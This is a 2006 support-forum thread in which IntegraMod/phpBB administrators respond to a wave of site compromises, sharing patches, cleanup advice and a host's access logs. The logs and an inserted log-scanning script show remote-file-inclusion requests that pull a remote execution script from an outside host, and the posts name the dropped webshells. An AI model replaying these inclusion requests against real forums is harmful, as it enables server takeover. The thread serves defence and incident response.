Page 1 of 2

IntegraMod Security fix

PostPosted: Sat Aug 26, 2006 4:50 am
Author: Michaelo
To avoid confusion, this post has been moved to the Security Forum; see the link below.

Moved to Security Forum

PostPosted: Sat Aug 26, 2006 5:52 am
Author: ayasha
Thanks Mike

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 6:02 am
Author: Unregistered
I believe this fix is for those people who used pre-modded files..

I have the following code in my functions_portal.php

Code:
    if ( !defined('IN_PHPBB') )
    {
        die('Hacking attempt');
        exit;
    }
    include_once($phpbb_root_path . 'includes/lite.' . $phpEx);


Do I still need to add the fix code?

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 6:40 am
Author: ihammo
Hi

A few of the other function_xxxxx.php files do not have the 'die hack' code in them either. Should they have?

Also, was a fix ever announced for the STYLE_URL exploit?

Thanks

PostPosted: Sat Aug 26, 2006 8:03 am
Author: Michaelo
Unregistered, I guess everyone should check, as it depends on when people downloaded their copy. As we say in Ireland... to be sure, to be sure :)

As for the STYLE_URL disable the Style Select block in admin until we have investigated this issue.

Mike

PostPosted: Sat Aug 26, 2006 8:14 am
Author: Unregistered
hi Michaelo,
What I meant was, wouldn't it be like duplicating the code?

PostPosted: Sat Aug 26, 2006 8:23 am
Author: Michaelo
Unregistered, sorry about that. Your copy of the file is fine, no need for edits.
Mike

PostPosted: Sat Aug 26, 2006 8:28 am
Author: Unregistered
Thanks.. and I am glad IntegraMod finally paid attention to the STYLE_URL vulnerability.

PostPosted: Sat Aug 26, 2006 8:44 am
Author: Unregistered
As we are getting more attacks, I think it's wise to send a mass email notifying those who haven't been hacked/attacked yet about the security patch..

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 9:02 am
Author: VillageIdiot
As a n00b, I need to ask. Does it matter where in the file I put this fix? First, last, throw a dart?

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 9:49 am
Author: ihammo
hey Michaelo

Thankfully I have already disabled the style select on my site, as I don't want people to be able to use it anyway.

I will go through all the functions and add the die hack code.

Cheers


Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 9:58 am
Author: evolver
ihammo wrote: Thankfully I have already disabled the style select on my site, as I don't want people to be able to use it anyway.

I don't think disabling the style select has anything to do with it...
It's in the URL that hackers are able to add code to break in...

PostPosted: Sat Aug 26, 2006 10:30 am
Author: Michaelo
True for you, evolver. Hiding it is not the answer, I stand corrected... Once it is disabled we will have to comment out the offending code in functions.php and rename the block file...
Code in this post has been updated... See the first post in this thread.
Part 1:
Edit this file: functions.php
Find the following code…

Code:
    if ( isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']) )
    {
        $style = urldecode( (isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : $HTTP_GET_VARS['STYLE_URL'] );
        if ( $theme = setup_style($style) )
        {
            setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);
            return;
        }
    }

    if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )
    {
        $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];
        if ( $theme = setup_style($style) )
        {
            return;
        }
    }


Replace with…
Code:
    /*
    if ( isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']) )
    {
        $style = urldecode( (isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : $HTTP_GET_VARS['STYLE_URL'] );
        if ( $theme = setup_style($style) )
        {
            setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']);
            return;
        }
    }

    if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) )
    {
        $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style'];
        if ( $theme = setup_style($style) )
        {
            return;
        }
    }
    */


Then (for the moment) rename block_imp_style_select.php to something like block_imp_style_select.xxx

PostPosted: Sat Aug 26, 2006 11:40 am
Author: Solomon
I added the code fix for functions_portal.php last night and was hacked again today. I will try the "Edit this file: functions.php" suggestion next.

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 12:10 pm
Author: Michaelo
You could also try this... Find any occurrence of

Code in this post has been updated... See the first post in this thread.

Code:
    if(isset($HTTP_POST_VARS['STYLE_URL']) || isset($HTTP_GET_VARS['STYLE_URL']))

replace with

    if(isset($HTTP_POST_VARS['STYLE_URL']) || (int) isset($HTTP_GET_VARS['STYLE_URL']))

And

    $style = urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : $HTTP_GET_VARS['STYLE_URL']);

with

    // cast the incoming style id to an integer before it reaches setup_style()
    $style = (int) urldecode((isset($HTTP_POST_VARS['STYLE_URL'])) ? $HTTP_POST_VARS['STYLE_URL'] : $HTTP_GET_VARS['STYLE_URL']);


And have you any more details of the hack...?

We have not determined where the hacker is gaining access...
The only vulnerabilities we can identify include the Style Select block code (STYLE_URL) and possibly two others relating to some versions of PHP.

Mike

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 12:31 pm
Author: Solomon
Michaelo wrote: And have you any more details of the hack...?

Mike


phpbb_security 1.0.3 & phpbb 2.0.21 are both vulnerable.
CHMOD settings don't matter.
Safety fix for "functions_portal.php" does not stop the hacks.

Folders they like to add files to are:
    /forum/cache/
    /forum/var_cache/
    /forum/profilcp/def/
    /forum/modules/cache/explain/
    /forum/files/
    /forum/includes/cache_tpls/
Pretty much pick any CHMOD: 777 folder.


Files they like to trash are:
    common.php
    portal.php
    phpbb_security.php
    config.php

They are Turks.
They dont like IntegraMOD.
They don't like Greeks, Israelis, or Americans.


PostPosted: Sat Aug 26, 2006 1:30 pm
Author: Pggar
I used the pre-modded files to update IM, but as I reported on the update topic, I checked all files and this was one of the code sections that was not included in the pre-modded files.

I hope this is the only vulnerability of IM.
Just to be on the safe side, I have removed the Style code as advised by Michaelo.

However, I'm quite worried because I'm getting several /search?q=Powered+by+IntegraMOD hits on my referrals page. This might mean I'm having a bunch of script kiddies on my site, but they don't seem to come from Turkey alone. Some IPs I got in the last couple of hours come from:
- Turkey
- Oman
- Germany
- Uruguay
- Argentina
- Canada
- Spain

This means that the script is widespread now.
I don't seem to have suffered anything until this moment.
I hope that means my code is secure.

PostPosted: Sat Aug 26, 2006 2:54 pm
Author: Michaelo
To determine which hack is being used, can people who have been hacked respond to this post with an answer to the following question:

Check if functions_portal.php contains this code (especially the root path setting)
Code:
    if ( !defined('IN_PHPBB') )
    {
        die("Hacking attempt");
    }
    $phpbb_root_path = "./";


Mike

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 3:01 pm
Author: Michaelo
toplist users read this! Hotfix for toplist 1.x

Code in this post has been updated... See the first post in this thread.
[code]  OPEN]

Note: register_globals must be on to use the latest (3) exploits, so if in doubt why not turn it off?

I don't know if people have this mod but this may help them avoid the potential hack... Mike

PostPosted: Sat Aug 26, 2006 3:14 pm
Author: ErikG
As I was hacked too and am using a stone-age-old version, I DON'T think it is 1.40 related. If it's in Integra, it's been there for a long time, or it's a weakness somehow in the DB. I got hacked today as well. It truly SUCKS butt.

My main worry is that they have gotten to my password for the database and the whole shebang out of config.php. What to do?

Do I need to ask my provider to trash it all and try to rebuild fresh? Suggestions welcomed!

PostPosted: Sat Aug 26, 2006 3:25 pm
Author: Michaelo
Should not be needed but a new password would be recommended...

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 3:29 pm
Author: Michaelo
Code in this post has been updated... See the first post in this thread.

Even More fixes...

kb_constants.php

Code:
    FIND
    // This file defines specific constants for the module

    BEFORE ADD
    if ( !defined('IN_PHPBB') )
    {
        die("Hacking attempt");
    }


admin_hacks_list.php
Code:
    FIND
    $phpbb_root_path = '../';
    if( !empty($setmodules) )
    {
        include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);
        $filename = basename(__FILE__);
        $module['General']['Hacks_List'] = $filename;
        return;
    }
    include($phpbb_root_path . 'extension.inc');
    (file_exists('pagestart.' . $phpEx)) ? include('pagestart.' . $phpEx) ]['Hacks_List'] = $filename;
        return;
    }
    $phpbb_root_path = './../';
    require($phpbb_root_path . 'extension.inc');
    require('./pagestart.' . $phpEx);


Many thanks to all the sites that helped in the discovery so far but there may be more...


Please read all posts in this thread as I don't have time to organise the fixes...
Mike

Links for more details: Here!

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 3:37 pm
Author: Solomon
Michaelo wrote: toplist users read this! Hotfix for toplist 1.x

[code]  OPEN]

Note: register_globals must be on to use the latest (3) exploits, so if in doubt why not turn it off?

I don't know if people have this mod but this may help them avoid the potential hack... Mike

I have this mod installed (v.1.0.0) but I cannot find any bit of the pre-existing code you mention. What line is this on?

Can you explain this a little further -> "Note: Register globals must be on to use the latest (3) exploits so if in doubt why not turn it off?"

PostPosted: Sat Aug 26, 2006 3:41 pm
Author: Michaelo
Post the top five or six lines of your toplist.php code here...

Some of the fixes are suggestions I came across which may not exactly mirror our files; however, I think a problem with the code is better than a hacked site, so I am posting everything that may help... Later we can go over things and sort out what's what...
Mike

PostPosted: Sat Aug 26, 2006 3:52 pm
Author: Solomon
Michaelo wrote: Post the top five or six lines of your toplist.php code here...

Some of the fixes are suggestions I came across which may not exactly mirror our files; however, I think a problem with the code is better than a hacked site, so I am posting everything that may help... Later we can go over things and sort out what's what...
Mike


Thanks
Code:
    <?php
    $template->set_filenames(array('body' => 'topsites_edit_body.tpl'));
    $siteid    = intval(($_GET['site']) ? $_GET['site'] : $HTTP_GET_VARS['site']);
    $site_info = GetTopsiteFromId($siteid);

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 4:24 pm
Author: Dioncecht
My host sent me his logs.. maybe this will help.

Code:
This is Hal Bouma with Netwisp writing to inform you that your web hosting account with us is currently violating our AUP/TOS policies. Your forum software is being exploited by hackers which is allowing them to upload and run PHP scripts of their choosing and attack other servers.

Here are the http logs for how the vulnerability is being injected:
"POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41415 "http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
rpghq.org:203.87.211.27 - - [26/Aug/2006:02:45:25 -0500] "POST /phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?HTTP/1.1" 200 41495 "http://www.rpghq.org/phpbb/includes/functions.php?phpbb_root_path=http://the-bos.org/memek.txt?" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

If you view the file that it was grabbing, http://the-bos.org/memek.txt, you can see that it's a remote execution script.
It has been uploaded to your forums/files directory as post.php which they are now using to run commands on your server:
rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:09 -0500] "POST /forums/files/post.php HTTP/1.1" 200 42087 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:31 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41168 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
rpghq.org:203.87.211.27 - - [26/Aug/2006:04:06:59 -0500] "POST /forums/files/post.php HTTP/1.1" 200 41251 "http://www.rpghq.org/forums/files/post.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

If you view the contents of the post.php, you will see it's the same script as the one that was grabbed off the-bos.org site.

Your forums have been disabled (its root directory has been changed to chmod 600) to prevent further attacks on the server and others. Please fix the exploits in your script before re-enabling it. Please also let me know when this is completed.

Let me know if you have any questions about this matter and I will be glad to answer them.


Hopefully this helps you find the exploit
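The two kinds of request in that e-mail (an include file called directly with a remote URL in `phpbb_root_path`, then repeated POSTs to a dropped `post.php` in a writable directory) are exactly what to look for in an access log. The Python script below is an added example, not part of Dioncecht's post or of IntegraMod; the log lines inside it are constructed to mirror the shape of the ones above, with `forum.example` and `attacker.example` standing in for the real hosts, and the list of writable directories is taken from Solomon's post earlier in the thread. One caveat worth noting: the logged requests end the remote URL with `?`, so whatever the vulnerable file appends after `$phpbb_root_path` becomes a query string to the attacker's server. No null byte is needed for that, so the detector matches on the scheme of the parameter value rather than looking for `%00`.

```python
"""Flag the request patterns from the hosting provider's log excerpt in an
Apache combined-format access log: include files requested directly with a
remote URL in a query parameter, and PHP files executed out of directories
that should only hold uploads or cache data.
Added example, not IntegraMod code; SAMPLE_LOG below is constructed."""
import re
from urllib.parse import parse_qsl

# The "vhost:ip" prefix is optional (the provider's log had it); IPv6 client
# addresses are not handled by this pattern.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>[^\s:]+):)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# A parameter value that is itself a URL: the register_globals RFI pattern.
# A trailing "?" or "%00" on the value makes no difference to this check.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.I)
# phpBB include files are never meant to be requested directly.
INCLUDE_DIRS = ("/includes/",)
# World-writable directories named in this thread as drop locations.
WRITABLE_DIRS = ("/cache/", "/var_cache/", "/profilcp/def/", "/modules/cache/explain/",
                 "/files/", "/includes/cache_tpls/", "/images/avatars/")

# Constructed sample log: two RFI attempts, two shell invocations, two benign hits.
SAMPLE_LOG = """\
forum.example:203.0.113.27 - - [26/Aug/2006:02:45:25 -0500] "POST /phpbb/includes/functions.php?phpbb_root_path=http://attacker.example/memek.txt? HTTP/1.1" 200 41495 "http://forum.example/phpbb/includes/functions.php?phpbb_root_path=http://attacker.example/memek.txt?" "Mozilla/5.0"
forum.example:203.0.113.27 - - [26/Aug/2006:02:46:10 -0500] "GET /phpbb/includes/functions_portal.php?phpbb_root_path=http://attacker.example/memek.txt%00 HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
forum.example:203.0.113.27 - - [26/Aug/2006:04:06:09 -0500] "POST /forums/files/post.php HTTP/1.1" 200 42087 "http://forum.example/forums/files/post.php" "Mozilla/5.0"
forum.example:198.51.100.8 - - [26/Aug/2006:04:07:00 -0500] "GET /forums/images/avatars/jkztawoe.php?act=ls HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
forum.example:192.0.2.44 - - [26/Aug/2006:04:08:12 -0500] "GET /forums/viewtopic.php?t=123&start=15 HTTP/1.1" 200 31000 "http://forum.example/forums/index.php" "Mozilla/5.0"
forum.example:192.0.2.45 - - [26/Aug/2006:04:09:30 -0500] "GET /forums/images/avatars/gallery/cat.gif HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of suspicious tags for one parsed request."""
    tags = []
    path, _, query = entry["target"].partition("?")
    # parse_qsl percent-decodes values, so "%00" becomes a real NUL here.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            tags.append(f"rfi:{key}")
    low = path.lower()
    if low.endswith(".php"):
        if any(d in low for d in INCLUDE_DIRS):
            tags.append("direct-include")
        if any(d in low for d in WRITABLE_DIRS):
            tags.append("php-in-writable-dir")
    return tags


def scan_log(text):
    """Return (ip, timestamp, method, target, tags) for every flagged line."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((entry["ip"], entry["ts"], entry["method"], entry["target"], tags))
    return hits


if __name__ == "__main__":
    for ip, ts, method, target, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} [{ts}] {method} {target} -> {', '.join(tags)}")
```

Run against a real log, the first tag is the one to act on immediately: a 200 response to a direct request for a file under `includes/` with a URL in the query string means the include executed, and the POSTs that follow from the same address show where the dropped script landed.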

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 5:35 pm
Author: Solomon
Dioncecht wrote: My host sent me his logs.. maybe this will help. (host e-mail and logs quoted in full in the post above)

In other words, they are exploiting "functions.php" and uploading a remote execution script file (c99.php, musa.php, or post.php) to random CHMOD: 777 folders, then running the remote execution script file from there.

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 6:37 pm
Author: Dr. Bantham
Michaelo wrote: kb_constants.php
Code:
    FIND
    // This file defines specific constants for the module

    BEFORE ADD
    if ( !defined('IN_PHPBB') )
    {
        die("Hacking attempt");
    }

My copy of this file is missing the lines indicated in the FIND for kb_constants.php. Where should I place the new code?

EDIT
I followed the link included and found the answer. It should appear before:
Code:
    // ---------------------------------------------------------------------START
    // This file defines specific constants for the module

PostPosted: Sat Aug 26, 2006 6:40 pm
Author: Michaelo
Dioncecht, it helps quite a bit, many thanks... it guides us in the right direction... Can you PM me the first few lines of your functions_portal.php and functions.php files.

The bit after the ***************************************************************************/
Thanks, Mike

PostPosted: Sat Aug 26, 2006 6:45 pm
Author: Michaelo
Dr. Bantham,

My kb_constants.php version may be different as I only have the 1.4.1 version. The main thing to add as the first few lines of code in this file is:
Code:
    if ( !defined('IN_PHPBB') )
    {
        die("Hacking attempt");
    }

Normally at the top of the page under the opening comments... (this exploit may not be the one that is hitting sites at the moment, but add the code just in case)

Mike

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 7:04 pm
Author: Dr. Bantham
According to Google Analytics, I have had 42 referrals from "powered by integramod" searches. I am holding my breath at this point.

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 7:07 pm
Author: Solomon
I was just hit again and I have done ALL of the suggestions.

This time my "index.php" was manipulated.

The file uploaded was called "jkztawoe.php" and it was uploaded to my "/forum/images/avatars/" folder.

jkztawoe.php
Code:
 <php>  

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 7:22 pm
Author: Dr. Bantham
integramod.com has been on and offline over the past few days, therefore I am not sure what to think since they are offline at the moment. I do not want to summon the ultimate jinx, mind you, but it seems a bit odd that integramod.com remains untouched while a global onslaught is being waged by miscreants intent on taking down IntegraMod users. Either they are using integramod.com as a window into our misery or there is some code variance between this site and the 1.4.0 release package. I hope the latter is true.

PostPosted: Sat Aug 26, 2006 7:35 pm
Author: Solomon
I don't understand why they haven't targeted this site either, and if they have then I don't understand why this site has survived.

PostPosted: Sat Aug 26, 2006 7:53 pm
Author: Dr. Bantham
Solomon wrote: I don't understand why they haven't targeted this site either, and if they have then I don't understand why this site has survived.
Another thread pointed out that the footer credit for integramod.com displays "Powered by KisMod". Would this be enough to avoid focus?

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 7:56 pm
Author: Drop-Forged
I received an e-mail from a guest of my site; apparently IntegraMod is not this hacker's only target.

http://forum.mamboserver.com/showthread.php?t=83899

PostPosted: Sat Aug 26, 2006 8:01 pm
Author: Solomon
Dr. Bantham wrote:
Solomon wrote: I don't understand why they haven't targeted this site either, and if they have then I don't understand why this site has survived.
Another thread pointed out that the footer credit for integramod.com displays "Powered by KisMod". Would this be enough to avoid focus?

They know the address and read everything we say. Any basic Google or Yahoo search for "integraMOD" shows http://www.integraMOD2.com at the #3 & #4 spots.

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 8:05 pm
Author: Dr. Bantham
If I do a Google search for "powered by integramod", the first return is:
http://www.securityfocus.com/archive/1/444207
This is strange as it appears to be a security warning for the attack that is taking place, having been logged two days ago.

The second is my site. I am certain that I will be taken down at some point, but why not yet?

Re: IntegraMod (version 1) Hack fix

PostPosted: Sat Aug 26, 2006 8:13 pm
Author: Solomon
Dr. Bantham wrote: If I do a Google search for "powered by integramod", the first return is:
http://www.securityfocus.com/archive/1/444207
This is strange as it appears to be a security warning for the attack that is taking place, having been logged two days ago.

The second is my site. I am certain that I will be taken down at some point, but why not yet?


Guess this explains it all: http://www.nukedx.com/?getxpl=47

Re: IntegraMod Hack fix

PostPosted: Sat Aug 26, 2006 8:46 pm
Author: Michaelo
It has become clear that there are several hackers at work possibly using two or more hack/exploits...

The main troublemaker appears to use the phpbb_root_path var to process the off-site script... needless to say, if the phpbb_root_path var is set correctly the script will fail... The hacker uploads several files to your site and proceeds to trash things.

If you have been hacked, remember to change your password...

The following code should fix the main threat but be aware it is not the only threat...

Edit functions_portal.php

[code]    FIND]

Please note this is almost certainly not the only hack/exploit affecting IntegraMod sites. But it would appear the two main hacks concentrate on the phpbb_root_path variable not being set inside the correct file and the IN_PHPBB define check being missing from crucial files.

Mike
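Michaelo's two root causes (an include file that does not assign `$phpbb_root_path` itself, and a file that can be requested directly because it lacks the `defined('IN_PHPBB')` check) are both mechanical enough to audit with a script rather than by opening each file. The Python audit below is an added example, not IntegraMod code or a fix posted in this thread; the three sample files it writes to a temporary directory are constructed, and its regular expressions are a heuristic that assumes the phpBB 2 style `include($phpbb_root_path . ...)` calls seen in this thread.

```python
"""Audit a phpBB 2 / IntegraMod tree for the two weaknesses named in the thread:
PHP files that can be requested directly (no IN_PHPBB guard) and files that
build include paths from $phpbb_root_path without assigning it themselves.
Added example, not IntegraMod code; SAMPLE_TREE is constructed."""
import os
import re
import tempfile

# The guard the thread tells people to add at the top of every include file.
GUARD_RE = re.compile(r"defined\s*\(\s*['\"]IN_PHPBB['\"]\s*\)")
# An assignment of the root path inside the file itself (so a GET parameter
# cannot supply it under register_globals).
ROOT_SET_RE = re.compile(r"^\s*\$phpbb_root_path\s*=", re.M)
# An include/require whose path starts with $phpbb_root_path.
ROOT_USE_RE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$phpbb_root_path")

# Constructed sample files: one hardened, one with both weaknesses, and one
# that is merely reachable but includes nothing.
SAMPLE_TREE = {
    "includes/functions_portal.php": (
        "<?php\n"
        "if ( !defined('IN_PHPBB') )\n{\n    die('Hacking attempt');\n}\n"
        "$phpbb_root_path = './';\n"
        "include_once($phpbb_root_path . 'includes/lite.' . $phpEx);\n"
    ),
    "includes/functions_kb.php": (
        "<?php\n"
        "// no guard and no local root path: with register_globals on, a GET\n"
        "// parameter can supply $phpbb_root_path to this file\n"
        "include($phpbb_root_path . 'includes/kb_constants.' . $phpEx);\n"
    ),
    "includes/kb_constants.php": "<?php\ndefine('KB_TABLE', 'phpbb_kb');\n",
}


def audit_file(rel, text):
    """Return (path, message) findings for one PHP source file."""
    findings = []
    guarded = bool(GUARD_RE.search(text))
    sets_root = bool(ROOT_SET_RE.search(text))
    uses_root = bool(ROOT_USE_RE.search(text))
    if not guarded:
        findings.append((rel, "no IN_PHPBB guard: file can be requested directly"))
    if uses_root and not sets_root:
        findings.append((rel, "includes via $phpbb_root_path but never assigns it: "
                              "attacker-controlled under register_globals"))
    if uses_root and not guarded:
        findings.append((rel, "directly reachable and includes via $phpbb_root_path: "
                              "remote file inclusion candidate"))
    return findings


def audit_tree(root):
    """Walk root and audit every .php file, returning all findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings.extend(audit_file(rel, text))
    return findings


def write_sample_tree():
    """Materialise SAMPLE_TREE under a fresh temporary directory."""
    root = tempfile.mkdtemp(prefix="im_audit_")
    for rel, body in SAMPLE_TREE.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, message in audit_tree(write_sample_tree()):
        print(f"{rel}: {message}")
```

Point `audit_tree()` at a real forum root and treat the third message as the priority: a file that is both reachable and includes through `$phpbb_root_path` is the combination the logged attack used. The guard alone closes the direct request; assigning the root path inside the file closes the parameter override even if the guard is forgotten somewhere, and turning register_globals off, as suggested later in the thread, removes the whole class.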

Re: IntegraMod Hack fix

PostPosted: Sat Aug 26, 2006 9:29 pm
Author: Dr. Bantham
I just now found the file jtvewvwu.php in my var_cache directory. Content as follows:
Code:
<php>
I have removed the file, but expect it to reappear with ease. Should I take my site down for protection of members and my host server provider?

PostPosted: Sat Aug 26, 2006 9:38 pm
Author: Michaelo
The original file is off-site; this is just the cache copy.

eval() evaluates the string given in code_str as PHP code. Among other things, this can be useful for storing code in a database text field for later execution, and that could be dodgy...
Take the site down and chmod the root directory to 600.
Mike

PostPosted: Sat Aug 26, 2006 10:29 pm
Author: Drop-Forged
Michaelo wrote: The original file is off-site; this is just the cache copy.

eval() evaluates the string given in code_str as PHP code. Among other things, this can be useful for storing code in a database text field for later execution, and that could be dodgy...
Take the site down and chmod the root directory to 600.
Mike


So you are saying that if we've been hacked, even if we deleted all files and started fresh, our database may have a hack in it???

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 12:11 am
Author: tekguru
Does changing this stop style changing from working, as we have two links on the QBar menu to swap styles?

PostPosted: Sun Aug 27, 2006 2:49 am
Author: Solomon
The topic should be changed from "IntegraMod Hack fix" to "IntegraMod Hack discussion" to lessen confusion until a solid fix is available.

Until a solid fix is available I've decided to CHMOD: 600 my "forum" directory and enable some .htaccess redirects to display a photo of a USA flag. Every time they do a search for "Powered by IntegraMOD" or "Powered by KisMod" and attempt to hit my site again, they can stare at my flag instead of me staring at theirs. My host is also monitoring for suspicious activity.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 3:09 am
Author: evolver
evolver wrote: Euhm, how many of these hacked sites have a link on integraMOD2.com...
...or maybe even still on integraMOD.com ??

No need for Google to find these...
No need for 'Powered by' keywords to find these...

There are easier ways to find integraMOD sites than just by using Google...
And of course, that could also be a very good reason why integraMOD.com hasn't been hacked yet...

Just don't focus at one direction only...
Think about every possibility, because that's how hackers think as well...

Also, think about the Referers at the homepage...
That can also open a window of opportunity to hackers.

And as a precaution...
Maybe there should be a separate rescue site for integramod.com.
Just a safe non-integramod site where all users can go for help and information if integraMOD2.com itself would be taken out...
Then nobody has to stay in the dark if something bad happens...

If not all disasters can be avoided, there should always be a disaster-plan ready...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 3:18 am
Author: Painface
If the PHP setting magic_quotes_gpc is set to ON on the server, then this hack won't be able to include the external files, as the remote attacker needs to use a null char at the end of the filename.

The file musa.php mentioned is the hack's own PHP shell with some nice settings (magic_quotes off etc), so make sure to delete this file if you have been attacked.

The fix in the beginning of this thread should be enough to stop this hack...

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 4:07 am
Author: evolver
We have to be careful not to place hacker code in the open...
Because it would make from integraMOD2.com a supportsite for hackers itself...
Wouldn't that be foolish...

Better only PM hackerscripts to the ones you can trust...
Always remember that there can be potential hackers among visitors...
You never know...

Just the fact that they can find it somewhere else,
doesn't mean that we should give it to them on a plate...

PostPosted: Sun Aug 27, 2006 5:13 am
Author: Unregistered
Hi, just found this page which was updated a couple of days back..

phpBB viewtopic.php Vulnerability Hack and Forensic Followup

by Marion Bates

Last modified: August 25 2006 16:05:41

http://www.whoopis.com/howtos/phpbb-vie ... index.html

Do we need to worry about this as well? :s

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 5:47 am
Author: Dr. Bantham
After finding the file jtvewvwu.php in my var_cache directory, my site seemed to be still operating without problems. However, when I proceeded to ACP, I received a white screen with several indicators that key files being referenced by functions.php were missing. I took the site down immediately and set the root directory permissions to 600 as Michaelo instructed. While perhaps overkill, I deleted all integramod directories from the server. This is my third or fourth time being hacked in about 18 months with IntegraMod, so I have recent backups of the database and server files as follows:

Database
8/27/06 1:39 am
8/26/06 9:26 pm
8/26/06 8:25 pm
8/25/06 6:54 am
8/12/06 8:34 am
7/30/06 8:33 am

I may have additional copies as well, but my database backup regimen often falters over time and the automatic IM backup has been generating 0 byte backups since a server migration several months back.

Before I took everything down last night, I used phpBB Backup Suite to create an SQL bin log. The only line contained was:
Code: Select all
/*!40019 SET @@session.max_insert_delayed_threads=0*/;
This may be normal, but I am listing it here for review.

I also use phpBB Backup Suite to create entire backups of my file structure, since I am utilizing a shared server host. My file backup dates are as follows:
8/26/06 9:31 pm
8/25/06 5:57 am
8/12/06 8:42 am
7/30/06 8:36 am

I list these dates because it appears that the file jtvewvwu.php was not present in the 7/30/06 backup but actually showed up in the var_cache directory as early as the 8/12/06 backup. I often check the dates of modified files and directories of my live site in order to identify tampering, but this one slipped by me since I often overlook cache directories as they are updated periodically.

Since I have a decent series of archives to analyze, are there any other files or anomalies I should search for?

My database size has not decreased at any point, therefore I am hoping that content has not been erased or modified within the database. How can I confirm this?

If this method has indeed compromised my database with executable embeds, how can I identify and remove these modifications?

What passwords should I change at this point? Administrators? SQL access? Server account?

When I bring the site back online, what should the root directory permissions be set to?

